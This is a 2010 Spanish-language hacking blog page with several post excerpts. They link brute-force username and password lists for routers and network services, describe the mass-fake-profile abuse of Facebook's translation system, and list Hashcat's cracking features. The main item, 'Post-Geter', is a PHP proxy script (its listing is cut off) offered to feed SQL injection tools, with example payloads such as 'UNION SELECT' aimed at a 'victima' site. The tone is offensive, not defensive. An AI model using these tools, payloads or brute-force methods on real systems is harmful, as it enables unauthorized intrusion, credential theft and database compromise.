Login-Root #DDLR Blog

Software Libre. Mentes Libres. Putas Pagas.

About me:

Blogroll: 15

[x] Agregar a loginroot

joker joker
dontcool dontcool
matt matt
oxono oxono
zer0-z0org zer0-z0org
l0ve l0ve
oceanik6 oceanik6
wilfred wilfred
em3trix em3trix
hielasangre hielasangre
knet knet

... Ver todos

Perfil de loginroot

[x]Nick: loginroot
Rango: Veteran
País: ar
Visitas: 33569
Votos: 119
En Blogrolls: 40
Status: PM

Patrocinadores:


Anuncia aquí

[x] Diccionarios rápidos [Routers - Servicios]

Publicado el 12/08/2010 12:08:00 en Hacking General. Total de votos: 7  Votar

Les dejo una recopilación de diccionarios cortos, ideales cuando necesiten hacer bruteforce tanto a routers (telnet - http - https) como a servicios (ssh - ftp - smtp - etc) y quieran probar los usuarios y passwords más utilizados.


Routers:


Usuarios más utilizados: http://paste2.org/p/946965
Passwords más utilizadas: http://paste2.org/p/946966
Combo (user:pass) (recomendado): http://paste2.org/p/946968

Servicios:


Usuarios más utilizados: http://paste2.org/p/946972
Passwords más utilizadas: http://paste2.org/p/946970



Comentarios: 6 | Leer comentarios

[x] Hackearon Facebook (dedelere verdim)

Publicado el 29/07/2010 12:07:00 en Hacking General. Total de votos: 3  Votar

ACTUALIZACION DEL RINCON DE KIKITO:

http://kikoarg.diosdelared.com/?coment=7929

Muy ingenioso el ataque, Aparentemente no se trató de un acceso indebido a los sistemas, sino de una ingeniosa burla al sistema de traducción que le permite a los usuarios proponer mejoras en las traducciones a otros idiomas distintos al inglés. Básicamente lo que hicieron un grupo de usuarios fue crear cientos de perfiles falsos, y con ellos proponer mejores traducciones en forma masiva. Como Facebook posee este sistema de “escuchar a los usuarios”, si muchos usuarios proponen traducciones iguales el cambio se aplica automáticamente y queda vulnerable a este tipo de incidentes. ¿Qué pueden hacer los usuarios? Nada, en este caso sólo esperar que la gente de Facebook corrija las traducciones que quedaron erróneas.

Ahora se comprende porque aparecian frases en portugues, luego en turco, y algunas en castellano. Se ve que compartieron el metodo en algun irc/foro y comenzaron a hacerlo varios grupos distintos.

______________________________________________________________________

La red social mas conocida del mundo fue hackeada hace un par de horas, aca les dejo unas capturas de pantallas que se pueden ver, son 100% reales.

























Comentarios: 17 | Leer comentarios

[x] Post-Geter v0.1 [Login-Root | oceanik6]

Publicado el 07/07/2010 12:07:00 en Hacking Tools. Total de votos: 7  Votar

Esta herramienta fue codeada por oceanik6, le habia pedido de codear algo para transformar los POST en GET (para asi poder usarlo en tools que no permiten POST) y salió esto.


El funcionamiento es básico, crean un archivo llamado post.txt que contenga las cabeceras POST (esto lo miran con el Live HTTP Headers, por ejemplo), pero con la variable vulnerable con el valor "{oceanik6}". Ejemplo:

"email=1&uid={oceanik6}" <= Ese es el POST que guardaremos en post.txt (sin las comillas), la variable vuln en este ejemplo a SQL Inyection es $uid.

Ponemos el post-geter.php y el post.txt en una misma carpeta y levantamos Apache (o usamos algun hackedhost, o host propio).

Luego la ejecutamos asi (ejemplo):


http://localhost/post-geter.php?file=http://www.victima.com/vulnerable.php&varvuln=1 AND 1=1--


http://localhost/post-geter.php?file=http://www.victima.com/vulnerable.php&varvuln=1 AND 1=0--


http://localhost/post-geter.php?file=http://www.victima.com/vulnerable.php&varvuln=1 UNION SELECT [...] --

[etc...]

NOTA: &varvuln LO DEJAN ASI, no es que ponen &uid, no, siempre es &varvuln cuando llaman al script.

En caso de usar una tool para SQL, sería:

perl tool_sql.pl -url "http://localhost/post-geter.php?file=http://www.victima.com/vulnerable.php&varvuln=1" [etc...]

Y haria el mismo trabajo, ya que el Post-Geter trabaja como proxy entre la tool de SQL Inyection y la web vulnerable.

Simple, pero util.

Code:

<!--
Como usar:
Cree un documento de texto conteniendo las variables POST (nombre=valor) llamado "post.txt"
En la variable vulnerable coloque como valor "{oceanik6}"
Llame al script de la siguiente manera (ejemplo): http://localhost/post-geter.php?file=http://www.victima.com/vulnerable.php&varvuln=1 AND 1=1--
--!>
<style>
.xheader
{
background-color:Black;
}
.xoceanik6
{
font-size:15px;
font-family:Arial;
color:Lime;
font-weight:Bold;
}
.xlogin-root
{
font-size:15px;
font-family:Arial;
color:Red;
font-weight:Bold;
}
.xtext
{
font-size:15px;
font-family:Arial;
color:Yellow;
font-weight:Bold;
}
.xtitle
{
font-size:25px;
font-family:Arial;
color:White;
font-weight:Bold;
}
</style>
<?php
error_reporting(0);
$file=$_GET['file'];
$varvuln=$_GET['varvuln'];
echo "
<div class='xheader'>
<center><font class='xtitle'>Post-Geter</font></center>
<font class='xtext'>C0der: </font><font class='xoceanik6'>oceanik6</font>
<br>
<font class='xtext'>Idea: </font><font class='xlogin-root'>Login-Root</font>
";
if (!isset($_GET['file']) OR !isset($_GET['varvuln']))
{
echo "
<br>
&l... [/url]
[/trombi]

Continúa aquí...

Comentarios: 7 | Leer comentarios

[x] Técnicas de Detección Avanzada de interconectividad

Publicado el 17/05/2010 12:05:00 en Hacking General. Total de votos: 5  Votar




Lindo texto escrito por Víctor Escudero Rubio (Sun Microsystems) sobre la detección de equipos de una red.

Páginas: 31.
Contenido:



Download:

HTML: http://sun-microsystems.org/Tecnicas_de_Deteccion/
PDF : http://sun-microsystems.org/Tecnicas_de_Deteccion/Tecnicas_de_Deteccion.pdf

Comentarios: 9 | Leer comentarios

[x] Hashcat [Advanced Password Recovery] [*nix / Windows]

Publicado el 03/05/2010 12:05:00 en Hacking Tools. Total de votos: 6  Votar

Hashcat, básicamente, vendria a ser la versión "free" de PasswordsPro. Como ventajas les puedo comentar que en si es mucho más rápida que ésta (es multi-threading), soporta una gran cantidad diversa de hashes, y lo mejor, es gratuita y disponible para Windows / *nix. Adicionalmente existe una versión GUI para Windows. Más abajo tambien les dejo oclHashcat, lo mismo pero que utiliza el CPU de Nvidia (CUDA) o ATI, según se disponga (mucho más veloz).

Características (Inglés) (Hashcat):

    * Free
    * Multi-Threaded
    * Multi-Hash
    * Linux & Windows native binaries
    * Fastest cpu-based multihash cracker
    * SSE2 accelerated
    * All Attack-Modes except Brute-Force and Permutation can be extended by Hybrid-Attack rules
    * Very fast Hybrid-Attack engine
    * Rules mostly compatible with JTR and PasswordsPro
    * Possible to resume or limit session
    * Automatically recognizes recovered hashes from outfile at startup
    * Can automatically generate random rules for Hybrid-Attack
    * Load hashlist with more than 3 million hashes of any type at once
    * Load saltlist from external file and then use them in a Brute-Force Attack variant
    * Able to work in an distributed environment
    * Specify multiple wordlists and also multiple directories of wordlists
    * Number of threads can be configured
    * Threads run on lowest priority
    * 33+ Algorithms implemented with performance in mind
    * ... and much more


Características (Inglés) (oclHashcat):

# Free
# Multi-GPU
# Multi-Hash
# Linux & Windows native binaries
# Uses OpenCL
# Fastest multihash MD5 cracker on NVidia cards
# Fastest multihash MD5 cracker on ATI 5xxx cards
# Supports wordlists (not limited to Brute-Force / Mask-Attack)
# Can mix wordlists with Mask-Attack to emulate Hybrid-Attacks
# Runs very cautious, you can still watch movies while cracking
# Number of workload can be configured (like -n in hashcat)
# Supports pause / resume
# Supports huge numbers of hashes (4 million and more)
# Able to work in a distributed environment
# Includes hashcats entire rule engine to modify wordlists on start


(Hashcat) soporta:

    * MD5
    * md5($pass.$salt)
    * md5($salt.$pass)
    * md5(md5($pass))
    * md5(md5(md5($pass)))
    * md5(md5($pass).$salt)
    * md5(md5($salt).$pass)
    * md5($salt.md5($pass))
    * md5($salt.$pass.$salt)
    * md5(md5($salt).md5($pass))
    * md5(md5($pass).md5($salt))
    * md5($salt.md5($salt.$pass))
    * md5($salt.md5($pass.$salt))
    * md5($username.0.$pass)
    * md5(strtoupper(md5($pass)))
    * SHA1
    * sha1($pass.$salt)
    * sha1($salt.$pass)
    * sha1(sha1($pass))
    * sha1(sha1(sha1($pass)))
    * sha1(strtolower($username).$pass)
    * MySQL
    * MySQL4.1/MySQL5... [/url]
[/trombi]

Continúa aquí...

Comentarios: 11 | Leer comentarios
Ver: Siguientes 5



Powered by Diosdelared.com CMS Blogs
© Diosdelared 2009